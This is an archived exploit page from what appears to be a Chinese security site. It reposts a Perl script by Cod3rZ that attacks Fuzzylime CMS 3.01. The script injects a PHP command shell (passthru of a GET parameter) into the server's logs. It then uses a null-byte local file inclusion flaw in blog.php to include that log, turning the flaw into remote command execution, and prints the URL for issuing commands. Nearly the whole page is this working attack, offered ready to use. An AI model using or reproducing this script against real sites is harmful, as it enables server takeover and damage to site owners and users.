首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
fuzzylime cms 3.01a (file) Local File Inclusion Exploit
来源:http://cod3rz.helloweb.eu 作者:Cod3rZ 发布时间:2008-07-08  
#!/usr/bin/perl
# Fuzzylime CMS 3.01 LFI / RCE
# author  : Cod3rZ
# website : http://cod3rz.helloweb.eu
#
# http://[site]/blog.php?file=../[file]\0
# LFI TO RCE
use LWP::UserAgent;
system("cls");
#system("clear");
print " -------------------------------------------------\n";
print " Fuzzylime CMS 3.01 LFI / RCE                     \n";
print " Powered by Cod3rZ                                \n";
print " http://cod3rz.helloweb.eu                        \n";
print " -------------------------------------------------\n";
print " Insert Site (http://site.com/):                  \n ";
chomp($site = <STDIN>);
print " -------------------------------------------------\n";
print " Insert Logs path                                 \n ";
chomp($path = <STDIN>);
print " -------------------------------------------------\n";

#Infect Logs
$lwp = LWP::UserAgent->new;
$siten = $site.'/blog.php?file=';
$ua = $lwp->get($site.'coderz <?php passthru(stripslashes($_GET[cmd])); ?> /coderz');
#Control
$ua = $lwp->get($site.$path.'%00');
if($ua->content =~ m/cod3rz/) {
print " Ok ".$site." is infected                         \n";
print " -------------------------------------------------\n";
print " ".$siten.$path."&cmd=[command]\\0                 \n";
print " -------------------------------------------------\n";
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Safari + Quicktime <= 7.3 RTSP
·CMailServer 5.4.6 (CMailCOM.dl
·Triton CMS Pro (X-Forwarded-Fo
·fuzzylime (cms) 3.01 Remote Co
·Neutrino 0.8.4 Atomic Edition
·ImperialBB <= 2.3.5 Remote Fil
·martPPC Pay Per Click Script (
·Thelia 1.3.5 Multiple Vulnerab
·BrewBlogger 2.1.0.1 Arbitrary
·Site@School <= 2.4.10 (fckedit
·trixbox (langChoice) Local Fil
·Joomla Component altas 1.0 Mul
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved